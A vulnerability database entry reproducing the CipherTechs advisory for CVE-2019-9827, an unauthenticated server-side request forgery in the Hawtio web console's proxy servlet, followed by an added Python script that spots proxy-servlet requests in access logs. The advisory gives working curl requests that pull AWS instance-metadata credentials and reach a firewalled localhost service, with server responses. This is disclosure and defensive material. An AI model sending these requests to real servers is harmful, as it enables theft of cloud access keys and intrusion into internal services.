Hawt Hawtio code issue vulnerability

Vulnerability ID 1655222 Vulnerability type Code issue
Published 2019-07-05 Updated 2020-07-29
CVE number CVE-2019-9827

CNNVD-ID CNNVD-201907-216
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2019070026
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201907-216
|Vulnerability details
Hawt Hawtio is a modular web console for managing Java content.
Hawt Hawtio 2.5.0 and earlier versions contain a code issue vulnerability. The flaw stems from improper design or implementation during the development of the network system's or product's code.
|Vulnerability EXP
CipherTechs Inc - Security Advisory
Hawtio Server-Side Request Forgery
Introduction
============
Hawtio (https://hawt.io/) is a modular web console for managing Java.
CipherTechs discovered that Hawtio up to and including version 2.5.0
is vulnerable to unauthenticated Server-Side Request Forgery (SSRF).
CVE
===
CVE-2019-9827
Affected Platforms and Versions
===============================
Product: Hawtio
Version: <= 2.5.0
Vulnerability Overview
======================
Security risk: Medium
Attack Vector: Remote
Vendor Status: Notified
Vulnerability Description
=========================
Hawtio by default allows for any unauthenticated user to visit the proxy servlet page (/hawtio/proxy/).
Appending a destination server onto /proxy/ will forward the request from
the Hawtio server. This can be especially dangerous in AWS environments as
it's possible to request instance Metadata and retrieve sensitive information including access keys.
This vulnerability is also dangerous as it could expose internal
applications which allow connections from the Hawtio server's IP address.
Technical Details
=================
By default, versions >= 1.5.0 have a whitelist which only allows connections to 127.0.0.1.
Although the default whitelist settings prevent an attacker from making a
request to any servers outside of the localhost - an attacker could still
request any internal service on the local Hawtio host.
For any Hawtio versions < 1.5.0 an unauthenticated user can use the proxy servlet to make a request to any server.
Hawtio <= 1.4.68 - Obtaining AWS Access Keys via SSRF
-----------------------------------------------------
$ curl -i http://hawtio-target:8080/hawtio/proxy/http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
Access-Control-Allow-Origin: *
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3876041485"
Last-Modified: Thu, 21 Mar 2019 19:36:06 GMT
Content-Length: 1318
Date: Thu, 21 Mar 2019 19:58:45 GMT
Server: EC2ws
{
"Code" : "Success",
"LastUpdated" : "2019-03-21T19:35:50Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "[REDACTED]",
"SecretAccessKey" : "[REDACTED]",
"Token" : "[REDACTED]",
"Expiration" : "2019-03-22T01:38:33Z"
}
As shown above, using the proxy servlet allows any user to obtain AWS metadata information.
Hawtio 2.5.0
------------
$ curl -i http://hawtio-target:8080/hawtio/proxy/http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
HTTP/1.1 403 Forbidden
Date: Thu, 21 Mar 2019 20:06:16 GMT
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate, private
Pragma: no-cache
Access-Control-Allow-Origin: *
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self'; script-src 'self'
'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline';
font-src 'self' data:; connect-src 'self'; frame-src 'self'
Content-Type: application/json
Content-Length: 29
Server: Jetty(9.4.z-SNAPSHOT)
{"reason":"HOST_NOT_ALLOWED"}
That said, an attacker could still access arbitrary internal services and bypass ingress traffic rules on Hawtio 2.5.0.
A demonstration can be found below.
hawtio$ sudo ufw status numbered
Status: active
To                         Action      From
--                         ------      ----
[ 1] 8080                       ALLOW IN    Anywhere
[ 2] 127.0.0.1 80/tcp           ALLOW IN    127.0.0.1
[ 3] 22/tcp                     ALLOW IN    Anywhere
$ curl -i http://hawtio-target/test.txt
curl: (7) Failed to connect to hawtio-target port 80:
Connection refused
$ curl -i http://hawtio-target:8080/hawtio/proxy/http://127.0.0.1/test.txt
HTTP/1.1 200 OK
Date: Thu, 21 Mar 2019 20:18:34 GMT
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate, private
Pragma: no-cache
Access-Control-Allow-Origin: *
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self'; script-src 'self'
'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline';
font-src 'self' data:; connect-src 'self'; frame-src 'self'
Server: SimpleHTTP/0.6 Python/2.7.13
Date: Thu, 21 Mar 2019 20:18:34 GMT
Content-Type: text/plain
Last-Modified: Thu, 21 Mar 2019 20:07:34 GMT
Content-Length: 11
Secrets...
Recommendations
===============
Upgrade to Hawtio >= 1.5.0 to prevent SSRF from accessing arbitrary URLs. Services listening on localhost can still
be accessed through SSRF exploitation in versions > 1.5.0, so CipherTechs recommends disabling the proxy servlet
entirely. CipherTechs did not exhaustively test Hawtio, so it is still not recommended to expose this developer tool on
the Internet.
In terms of protecting AWS data, a daemon developed by Netflix-Skunkworks can be implemented to block
all connections to AWS metadata (169.254.169.254). Only a designated user who runs the proxy daemon can access the
metadata service. CipherTechs published a blog post on how to
implement this solution here: https://www.ciphertechs.com/protecting-aws-metadata-from-zero-day-ssrf-attacks/
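As an added defender-side example (not part of the CipherTechs advisory and not Hawtio code), the following Python triages web-server access logs for requests that reached the proxy servlet and classifies each forwarded destination as the AWS metadata endpoint, a loopback service (still reachable behind the >= 1.5.0 allowlist) or anything else. The log lines are constructed, and the code assumes the URL shape shown in the advisory, where the destination URL is appended to /hawtio/proxy/ (possibly percent-encoded).

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (common log format); not taken from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Mar/2019:19:58:45 +0000] "GET /hawtio/proxy/http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 1318
10.0.0.5 - - [21/Mar/2019:20:06:16 +0000] "GET /hawtio/proxy/http://169.254.169.254/latest/meta-data/ HTTP/1.1" 403 29
10.0.0.5 - - [21/Mar/2019:20:18:34 +0000] "GET /hawtio/proxy/http://127.0.0.1/test.txt HTTP/1.1" 200 11
10.0.0.9 - - [21/Mar/2019:20:20:00 +0000] "GET /hawtio/index.html HTTP/1.1" 200 5120
10.0.0.7 - - [21/Mar/2019:20:21:00 +0000] "GET /hawtio/proxy/http%3A%2F%2F10.0.0.1%3A8161%2Fadmin HTTP/1.1" 200 400
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
PROXY_PREFIX = "/hawtio/proxy/"         # servlet path named in the advisory
METADATA_HOSTS = {"169.254.169.254"}     # AWS instance metadata endpoint
LOOPBACK_RE = re.compile(r"^(127(\.\d{1,3}){3}|localhost|::1)$")


def classify_target(path):
    """Return (target_host, category) for a proxy-servlet request path, else None.
    Assumes the advisory's URL shape: destination appended to /hawtio/proxy/."""
    if not path.startswith(PROXY_PREFIX):
        return None
    target = unquote(path[len(PROXY_PREFIX):])   # clients may percent-encode the URL
    if "://" not in target:                      # tolerate a bare host[:port]/path
        target = "http://" + target
    host = (urlsplit(target).hostname or "").lower()
    if host in METADATA_HOSTS:
        return host, "cloud-metadata"
    if LOOPBACK_RE.match(host):
        return host, "loopback"          # still reachable behind the >= 1.5.0 allowlist
    return host, "other"                 # reachable only on versions without the allowlist


def find_proxy_requests(log_text):
    """One finding per logged request that hit the proxy servlet."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        cls = classify_target(m["path"])
        if cls is None:
            continue
        host, category = cls
        status = int(m["status"])
        findings.append({"src": m["src"], "ts": m["ts"], "host": host, "category": category,
                         "status": status, "blocked": status == 403})  # 403 = HOST_NOT_ALLOWED
    return findings
```

A proxy request that was not blocked and targets the metadata endpoint or a loopback service is the signal worth alerting on; a 403 shows the 2.5.0 allowlist did its job for that host.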
Timeline
========
2019.02.25 - Vulnerability Discovered by CipherTechs
2019.03.27 - Redhat Notified
2019.06.27 - 90 day disclosure date
The contents of this advisory are Copyright(c) 2019 CipherTechs Inc.
====================================================================================================
About CipherTechs
CipherTechs is a global Cyber Security service provider
founded in 2001 that remains privately held with headquarters in New York
City. CipherTechs is exclusively focused on cyber security and provides a
full service solution portfolio. We service our customers through the
following main practice areas: Offensive Security, Defensive Security,
MSSP and SOC, Audit and Compliance, Training and Product Procurement.
|References

Source: www.ciphertechs.com

Link: https://www.ciphertechs.com/hawtio-advisory/

Source: packetstormsecurity.com

Link: https://packetstormsecurity.com/files/153524/Hawtio-2.5.0-Server-Side-Request-Forgery.html

Source: nvd.nist.gov

Link: https://nvd.nist.gov/vuln/detail/CVE-2019-9827